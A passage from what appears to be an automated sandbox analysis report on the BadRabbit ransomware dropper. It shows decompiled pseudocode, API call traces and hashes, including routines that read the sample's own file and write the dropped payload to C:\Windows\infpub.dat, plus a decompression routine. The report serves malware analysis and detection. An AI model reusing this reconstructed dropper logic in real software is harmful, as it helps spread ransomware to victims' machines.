                                                                                                                                                                                        							_pop(_t70);
                                                                                                                                                                                        							_pop(_t95);
                                                                                                                                                                                        							return E01321499(_t69, _t70, _v8 ^ _t98, _t88, _t95, _t97);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}


                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 013210F8
                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000), ref: 013210FF
                                                                                                                                                                                          • Part of subcall function 01321000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0132101A
                                                                                                                                                                                          • Part of subcall function 01321000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0132102D
                                                                                                                                                                                          • Part of subcall function 01321000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0132103D
                                                                                                                                                                                          • Part of subcall function 01321000: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 01321044
                                                                                                                                                                                          • Part of subcall function 01321000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 01321060
                                                                                                                                                                                          • Part of subcall function 01321000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 01321071
                                                                                                                                                                                          • Part of subcall function 01321000: HeapFree.KERNEL32(00000000,?,?), ref: 01321078
                                                                                                                                                                                          • Part of subcall function 01321000: CloseHandle.KERNEL32(00000000,?), ref: 01321080
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 01321172
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,?), ref: 01321179
                                                                                                                                                                                        • memcpy.MSVCRT ref: 01321192
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 013211BB
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 013211BE
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01321207
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0132120A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$File$Allocate$FreeHandleModule$CloseCreateNameReadSizememcpy
                                                                                                                                                                                        • String ID: Uet
                                                                                                                                                                                        • API String ID: 3076684055-2766386878
                                                                                                                                                                                        • Opcode ID: 5c1357181c693cc9f931cfbe1271a015a1b5cc4357a44bd0e06cbf2ff11c2445
                                                                                                                                                                                        • Instruction ID: 63a5b4fbfe1c9525de51108cd46912b72a4f444d3fee99d36660371bcac8395d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c1357181c693cc9f931cfbe1271a015a1b5cc4357a44bd0e06cbf2ff11c2445
                                                                                                                                                                                        • Instruction Fuzzy Hash: F741B5B1A012289BDB30EF69DD44FAAB7BDFF98304F104199E909D7241DA31E954CFA0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E01321000(WCHAR* __eax, void** _a4, long* _a8) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				DWORD* _v12;
                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_t11 = CreateFileW(__eax, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                                                        				_t24 = _t11;
                                                                                                                                                                                        				if(_t24 == 0xffffffff) {
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t32 = GetFileSize(_t24, 0);
                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						FindCloseChangeNotification(_t24); // executed
                                                                                                                                                                                        						return _v12;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t17 = RtlAllocateHeap(GetProcessHeap(), 0, _t32); // executed
                                                                                                                                                                                        						_t28 = _t17;
                                                                                                                                                                                        						if(_t28 == 0) {
                                                                                                                                                                                        							L7:
                                                                                                                                                                                        							goto L8;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                        							_t18 = ReadFile(_t24, _t28, _t32,  &_v8, 0); // executed
                                                                                                                                                                                        							if(_t18 != 0 || _v8 != _t32) {
                                                                                                                                                                                        								 *_a4 = _t28;
                                                                                                                                                                                        								 *_a8 = _t32;
                                                                                                                                                                                        								_v12 = 1;
                                                                                                                                                                                        								goto L7;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								HeapFree(GetProcessHeap(), _t18, _t28);
                                                                                                                                                                                        								CloseHandle(_t24);
                                                                                                                                                                                        								return _v12;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}












                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0132101A
                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0132102D
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0132103D
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 01321044
                                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 01321060
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 01321071
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 01321078
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?), ref: 01321080
                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 013210A4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$File$CloseProcess$AllocateChangeCreateFindFreeHandleNotificationReadSize
                                                                                                                                                                                        • String ID: Uet
                                                                                                                                                                                        • API String ID: 631125692-2766386878
                                                                                                                                                                                        • Opcode ID: 88599b4e55636bc95ba9314f7511cd42ef3c110bd1c0526d50552c4aaa73cef5
                                                                                                                                                                                        • Instruction ID: bba4933497bf15fc15922fe37b64ae09e696ccdaf58637dc708c6dfb38c46a14
                                                                                                                                                                                        • Opcode Fuzzy Hash: 88599b4e55636bc95ba9314f7511cd42ef3c110bd1c0526d50552c4aaa73cef5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 17215172A01224ABC730AEA9AC4CF9BFF6CEB45762F108159F90992244D6358984C7A0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 72 1321260-1321282 CreateFileW 73 1321284-1321297 WriteFile 72->73 74 13212aa-13212af 72->74 75 13212a3-13212a4 FindCloseChangeNotification 73->75 76 1321299-132129c 73->76 75->74 76->75 77 132129e 76->77 77->75
                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E01321260(long __ebx, long _a4) {
                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                        				int _t7;
                                                                                                                                                                                        				struct _OVERLAPPED* _t11;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t11 = 0;
                                                                                                                                                                                        				_t4 = CreateFileW(L"C:\\Windows\\infpub.dat", 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                        				_t12 = _t4;
                                                                                                                                                                                        				if(_t12 != 0xffffffff) {
                                                                                                                                                                                        					_t7 = WriteFile(_t12, _a4, __ebx,  &_a4, 0); // executed
                                                                                                                                                                                        					if(_t7 != 0 && _a4 == __ebx) {
                                                                                                                                                                                        						_t11 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					FindCloseChangeNotification(_t12); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t11;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,013213F0,?,?,?), ref: 01321277
                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,013213F0,?,?,?), ref: 0132128F
                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,013213F0,?,?,?), ref: 013212A4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
• Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                        • String ID: C:\Windows\infpub.dat
                                                                                                                                                                                        • API String ID: 3805958096-2284094909
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 120 1323393-13233a5 malloc
                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E01323393(signed int _a8, signed int _a12) {
                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t5 = malloc(_a8 * _a12); // executed
                                                                                                                                                                                        				return _t5;
                                                                                                                                                                                        			}





                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
• Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: malloc
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                        			E0132201D(signed int* __ebx, signed int __ecx, unsigned int __edx, signed int __edi, signed char** __esi) {
                                                                                                                                                                                        				signed int _t753;
                                                                                                                                                                                        				signed int _t785;
                                                                                                                                                                                        				signed int _t787;
                                                                                                                                                                                        				signed int _t792;
                                                                                                                                                                                        				signed int _t793;
                                                                                                                                                                                        				signed int _t796;
                                                                                                                                                                                        				signed int _t800;
                                                                                                                                                                                        				signed int* _t920;
                                                                                                                                                                                        				signed int _t928;
                                                                                                                                                                                        				signed int _t935;
                                                                                                                                                                                        				void* _t940;
                                                                                                                                                                                        				unsigned int _t1054;
                                                                                                                                                                                        				signed int _t1055;
                                                                                                                                                                                        				signed int _t1056;
                                                                                                                                                                                        				signed int _t1060;
                                                                                                                                                                                        				signed int _t1103;
                                                                                                                                                                                        				intOrPtr _t1105;
                                                                                                                                                                                        				signed int _t1106;
                                                                                                                                                                                        				signed char** _t1125;
                                                                                                                                                                                        				intOrPtr* _t1127;
                                                                                                                                                                                        				void* _t1164;
                                                                                                                                                                                        
                                                                                                                                                                                        				L0:
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					L0:
                                                                                                                                                                                        					_t1125 = __esi;
                                                                                                                                                                                        					_t1103 = __edi;
                                                                                                                                                                                        					_t1054 = __edx;
                                                                                                                                                                                        					_t928 = __ecx;
                                                                                                                                                                                        					_t920 = __ebx;
                                                                                                                                                                                        					if(__edi >= 0xe) {
                                                                                                                                                                                        						goto L180;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L177:
                                                                                                                                                                                        					__eax =  *(__ebp - 8);
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						L178:
                                                                                                                                                                                        						if(__ecx == 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L179:
                                                                                                                                                                                        						__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        						 *(__ebp - 4) = __ecx;
                                                                                                                                                                                        						__ecx = __edi;
                                                                                                                                                                                        						__eax = __eax << __cl;
                                                                                                                                                                                        						__edi = __edi + 8;
                                                                                                                                                                                        						__ecx =  *(__ebp - 4);
                                                                                                                                                                                        						__edx = __edx + __eax;
                                                                                                                                                                                        						__eax =  *(__ebp - 8);
                                                                                                                                                                                        						__eax =  *(__ebp - 8) + 1;
                                                                                                                                                                                        						 *(__ebp - 0xc) = __edx;
                                                                                                                                                                                        						 *(__ebp - 8) = __eax;
                                                                                                                                                                                        						if(__edi < 0xe) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L180;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L322:
                                                                                                                                                                                        					_t935 =  *(_t1164 - 4);
                                                                                                                                                                                        					L323:
                                                                                                                                                                                        					_t712 = _t1164 + 8; // 0x38
                                                                                                                                                                                        					_t1127 =  *_t712;
                                                                                                                                                                                        					 *(_t1127 + 0xc) =  *(_t1164 - 0x1c);
                                                                                                                                                                                        					_t716 = _t1164 - 8; // 0x38
                                                                                                                                                                                        					 *(_t1127 + 0x10) =  *(_t1164 - 0x18);
                                                                                                                                                                                        					_t1060 = 0;
                                                                                                                                                                                        					 *_t1127 =  *_t716;
                                                                                                                                                                                        					 *(_t1127 + 4) = _t935;
                                                                                                                                                                                        					_t920[0xf] = _t1103;
                                                                                                                                                                                        					_t1105 =  *((intOrPtr*)(_t1164 - 0x28));
                                                                                                                                                                                        					_t920[0xe] =  *(_t1164 - 0xc);
                                                                                                                                                                                        					if(_t920[0xa] != 0) {
                                                                                                                                                                                        						L328:
                                                                                                                                                                                        						_t785 = E01322DCB(_t1127,  *(_t1127 + 0xc), _t1105 -  *(_t1127 + 0x10));
                                                                                                                                                                                        						if(_t785 == 0) {
                                                                                                                                                                                        							L331:
                                                                                                                                                                                        							_t1060 = 0;
                                                                                                                                                                                        							L332:
                                                                                                                                                                                        							_t787 =  *(_t1164 - 0x38) -  *(_t1127 + 4);
                                                                                                                                                                                        							_t1106 = _t1105 -  *(_t1127 + 0x10);
                                                                                                                                                                                        							 *((intOrPtr*)(_t1127 + 8)) =  *((intOrPtr*)(_t1127 + 8)) + _t787;
                                                                                                                                                                                        							 *((intOrPtr*)(_t1127 + 0x14)) =  *((intOrPtr*)(_t1127 + 0x14)) + _t1106;
                                                                                                                                                                                        							_t920[7] = _t920[7] + _t1106;
                                                                                                                                                                                        							 *(_t1164 - 0x38) = _t787;
                                                                                                                                                                                        							if(_t920[2] != _t1060) {
                                                                                                                                                                                        								if(_t1106 != 0) {
                                                                                                                                                                                        									_push(_t1106);
                                                                                                                                                                                        									_push( *(_t1127 + 0xc) - _t1106);
                                                                                                                                                                                        									_push(_t920[6]);
                                                                                                                                                                                        									if(_t920[4] == _t1060) {
                                                                                                                                                                                        										_t796 = E01322E91();
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_t796 = E013230C1();
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t920[6] = _t796;
                                                                                                                                                                                        									_t1060 = 0;
                                                                                                                                                                                        									 *(_t1127 + 0x30) = _t796;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if( *_t920 == 0x13) {
                                                                                                                                                                                        								L340:
                                                                                                                                                                                        								_t1060 = 0x100;
                                                                                                                                                                                        								goto L341;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								L339:
                                                                                                                                                                                        								if( *_t920 != 0xe) {
                                                                                                                                                                                        									L341:
                                                                                                                                                                                        									 *(_t1164 + 8) = 0x80;
                                                                                                                                                                                        									asm("sbb ecx, ecx");
                                                                                                                                                                                        									_t789 =  ==  ?  *(_t1164 + 8) : 0;
                                                                                                                                                                                        									_t790 = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060;
                                                                                                                                                                                        									_t791 = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060 + _t920[0xf];
                                                                                                                                                                                        									 *((intOrPtr*)(_t1127 + 0x2c)) = ( ==  ?  *(_t1164 + 8) : 0) + ( ~(_t920[1]) & 0x00000040) + _t1060 + _t920[0xf];
                                                                                                                                                                                        									if( *(_t1164 - 0x38) != 0) {
                                                                                                                                                                                        										L343:
                                                                                                                                                                                        										if( *((intOrPtr*)(_t1164 + 0xc)) != 4) {
                                                                                                                                                                                        											L345:
                                                                                                                                                                                        											_t792 =  *(_t1164 - 0x20);
                                                                                                                                                                                        											L138:
                                                                                                                                                                                        											return _t792;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L344:
                                                                                                                                                                                        										_t793 =  *(_t1164 - 0x20);
                                                                                                                                                                                        										_t940 = 0xfffffffb;
                                                                                                                                                                                        										_t792 =  ==  ? _t940 : _t793;
                                                                                                                                                                                        										goto L138;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									L342:
                                                                                                                                                                                        									if(_t1106 == 0) {
                                                                                                                                                                                        										goto L344;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L343;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L340;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L329:
                                                                                                                                                                                        						 *_t920 = 0x1e;
                                                                                                                                                                                        						L330:
                                                                                                                                                                                        						_push(0xfffffffc);
                                                                                                                                                                                        						L137:
                                                                                                                                                                                        						_pop(_t792);
                                                                                                                                                                                        						goto L138;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L324:
                                                                                                                                                                                        					if(_t1105 ==  *(_t1127 + 0x10)) {
                                                                                                                                                                                        						goto L332;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L325:
                                                                                                                                                                                        					if( *_t920 >= 0x1d) {
                                                                                                                                                                                        						goto L332;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L326:
                                                                                                                                                                                        					if( *_t920 < 0x1a) {
                                                                                                                                                                                        						goto L328;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L327:
                                                                                                                                                                                        					if( *((intOrPtr*)(_t1164 + 0xc)) == 4) {
                                                                                                                                                                                        						goto L332;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L328;
                                                                                                                                                                                        					L180:
                                                                                                                                                                                        					_t1103 = _t1103 - 0xe;
                                                                                                                                                                                        					_t1055 = _t1054 >> 5;
                                                                                                                                                                                        					 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        					_t920[0x18] = (_t1054 & 0x0000001f) + 0x101;
                                                                                                                                                                                        					_t1056 = _t1055 >> 5;
                                                                                                                                                                                        					_t920[0x19] = (_t1055 & 0x0000001f) + 1;
                                                                                                                                                                                        					_t1054 = _t1056 >> 4;
                                                                                                                                                                                        					 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        					_t920[0x17] = (_t1056 & 0x0000000f) + 4;
                                                                                                                                                                                        					if(_t920[0x18] > 0x11e) {
                                                                                                                                                                                        						L183:
                                                                                                                                                                                        						_t1125[6] = "too many length or distance symbols";
                                                                                                                                                                                        						L31:
                                                                                                                                                                                        						 *_t920 = 0x1d;
                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                        							L135:
                                                                                                                                                                                        							_t753 =  *_t920;
                                                                                                                                                                                        							if(_t753 > 0x1e) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							L1:
                                                                                                                                                                                        							switch( *((intOrPtr*)(_t753 * 4 +  &M01322B54))) {
                                                                                                                                                                                        								case 0:
                                                                                                                                                                                        									L2:
                                                                                                                                                                                        									if(_t920[2] != 0) {
                                                                                                                                                                                        										L4:
                                                                                                                                                                                        										_push(0x10);
                                                                                                                                                                                        										_pop(_t763);
                                                                                                                                                                                        										__eflags = _t1103 - _t763;
                                                                                                                                                                                        										if(_t1103 >= _t763) {
                                                                                                                                                                                        											L8:
                                                                                                                                                                                        											__eflags = _t920[2] & 0x00000002;
                                                                                                                                                                                        											if((_t920[2] & 0x00000002) == 0) {
                                                                                                                                                                                        												L11:
                                                                                                                                                                                        												_t920[4] = _t920[4] & 0x00000000;
                                                                                                                                                                                        												_t764 = _t920[8];
                                                                                                                                                                                        												__eflags = _t764;
                                                                                                                                                                                        												if(_t764 != 0) {
                                                                                                                                                                                        													_t25 = _t764 + 0x30;
                                                                                                                                                                                        													 *_t25 =  *(_t764 + 0x30) | 0xffffffff;
                                                                                                                                                                                        													__eflags =  *_t25;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L13:
                                                                                                                                                                                        												__eflags = _t920[2] & 0x00000001;
                                                                                                                                                                                        												if((_t920[2] & 0x00000001) == 0) {
                                                                                                                                                                                        													L24:
                                                                                                                                                                                        													_t1125[6] = "incorrect header check";
                                                                                                                                                                                        													goto L17;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L14:
                                                                                                                                                                                        												_t767 = (_t1054 >> 8) + ((_t1054 & 0x000000ff) << 8);
                                                                                                                                                                                        												_push(0x1f);
                                                                                                                                                                                        												_pop(_t931);
                                                                                                                                                                                        												__eflags = _t767 % _t931;
                                                                                                                                                                                        												_t1054 =  *(_t1164 - 0xc);
                                                                                                                                                                                        												if(_t767 % _t931 != 0) {
                                                                                                                                                                                        													goto L24;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L15:
                                                                                                                                                                                        												__eflags = (_t1054 & 0x0000000f) - 8;
                                                                                                                                                                                        												if((_t1054 & 0x0000000f) == 8) {
                                                                                                                                                                                        													L18:
                                                                                                                                                                                        													_t1054 = _t1054 >> 4;
                                                                                                                                                                                        													_t1103 = _t1103 - 4;
                                                                                                                                                                                        													 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        													 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        													_t934 = (_t1054 & 0x0000000f) + 8;
                                                                                                                                                                                        													__eflags = _t920[9];
                                                                                                                                                                                        													if(_t920[9] != 0) {
                                                                                                                                                                                        														L22:
                                                                                                                                                                                        														__eflags = _t934 - _t920[9];
                                                                                                                                                                                        														if(_t934 <= _t920[9]) {
                                                                                                                                                                                        															goto L20;
                                                                                                                                                                                        														} else {
                                                                                                                                                                                        															_t1125[6] = "invalid window size";
                                                                                                                                                                                        															goto L17;
                                                                                                                                                                                        														}
                                                                                                                                                                                        													} else {
                                                                                                                                                                                        														_t920[9] = _t934;
                                                                                                                                                                                        														L20:
                                                                                                                                                                                        														_t1103 = 0;
                                                                                                                                                                                        														_t920[5] = 1 << _t934;
                                                                                                                                                                                        														_t774 = E01322E91(0, 0, 0);
                                                                                                                                                                                        														_t920[6] = _t774;
                                                                                                                                                                                        														_t1125[0xc] = _t774;
                                                                                                                                                                                        														_t1065 =  !( *(_t1164 - 0xc) >> 8) & 0x00000002 | 0x00000009;
                                                                                                                                                                                        														__eflags = _t1065;
                                                                                                                                                                                        														 *_t920 = _t1065;
                                                                                                                                                                                        														_t1054 = 0;
                                                                                                                                                                                        														goto L21;
                                                                                                                                                                                        													}
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													_t1125[6] = "unknown compression method";
                                                                                                                                                                                        													goto L17;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L9:
                                                                                                                                                                                        											__eflags = _t1054 - 0x8b1f;
                                                                                                                                                                                        											if(_t1054 != 0x8b1f) {
                                                                                                                                                                                        												goto L11;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_t1103 = 0;
                                                                                                                                                                                        												_t920[6] = E013230C1(0, 0, 0);
                                                                                                                                                                                        												_push(0x1f);
                                                                                                                                                                                        												_pop(_t776);
                                                                                                                                                                                        												 *((char*)(_t1164 - 0x14)) = _t776;
                                                                                                                                                                                        												 *((char*)(_t1164 - 0x13)) = 0x8b;
                                                                                                                                                                                        												_t778 = E013230C1(_t920[6], _t1164 - 0x14, 2);
                                                                                                                                                                                        												_t1054 = 0;
                                                                                                                                                                                        												_t920[6] = _t778;
                                                                                                                                                                                        												 *(_t1164 - 0xc) = 0;
                                                                                                                                                                                        												 *(_t1164 - 0x10) = 0;
                                                                                                                                                                                        												 *_t920 = 1;
                                                                                                                                                                                        												goto L134;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t4 = _t1164 - 8; // 0x38
                                                                                                                                                                                        											_t779 =  *_t4;
                                                                                                                                                                                        											while(1) {
                                                                                                                                                                                        												L6:
                                                                                                                                                                                        												__eflags = _t928;
                                                                                                                                                                                        												if(_t928 == 0) {
                                                                                                                                                                                        													goto L322;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												L7:
                                                                                                                                                                                        												 *(_t1164 - 4) = _t928 - 1;
                                                                                                                                                                                        												_t798 = ( *_t779 & 0x000000ff) << _t1103;
                                                                                                                                                                                        												_t1103 = _t1103 + 8;
                                                                                                                                                                                        												_t928 =  *(_t1164 - 4);
                                                                                                                                                                                        												_t1054 = _t1054 + _t798;
                                                                                                                                                                                        												_t7 = _t1164 - 8; // 0x38
                                                                                                                                                                                        												_t779 =  *_t7 + 1;
                                                                                                                                                                                        												 *(_t1164 - 0xc) = _t1054;
                                                                                                                                                                                        												 *(_t1164 - 8) = _t779;
                                                                                                                                                                                        												 *(_t1164 - 0x10) = _t1103;
                                                                                                                                                                                        												__eflags = _t1103 - 0x10;
                                                                                                                                                                                        												if(_t1103 < 0x10) {
                                                                                                                                                                                        													continue;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												goto L8;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L322;
                                                                                                                                                                                        										}
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										 *_t920 = 0xc;
                                                                                                                                                                                        										goto L135;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 1:
                                                                                                                                                                                        									L25:
                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									__eflags = __edi - __eax;
                                                                                                                                                                                        									if(__edi >= __eax) {
                                                                                                                                                                                        										L29:
                                                                                                                                                                                        										__ebx[4] = __edx;
                                                                                                                                                                                        										__eflags = __dl - 8;
                                                                                                                                                                                        										if(__dl == 8) {
                                                                                                                                                                                        											L32:
                                                                                                                                                                                        											__eflags = __edx & 0x0000e000;
                                                                                                                                                                                        											if((__edx & 0x0000e000) == 0) {
                                                                                                                                                                                        												L34:
                                                                                                                                                                                        												__ecx = __ebx[8];
                                                                                                                                                                                        												__eflags = __ecx;
                                                                                                                                                                                        												if(__ecx != 0) {
                                                                                                                                                                                        													__edx = __edx >> 8;
                                                                                                                                                                                        													__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                                                                                                        													__eflags = __eax;
                                                                                                                                                                                        													 *__ecx = __eax;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__eflags = __ebx[4] & 0x00000200;
                                                                                                                                                                                        												if((__ebx[4] & 0x00000200) != 0) {
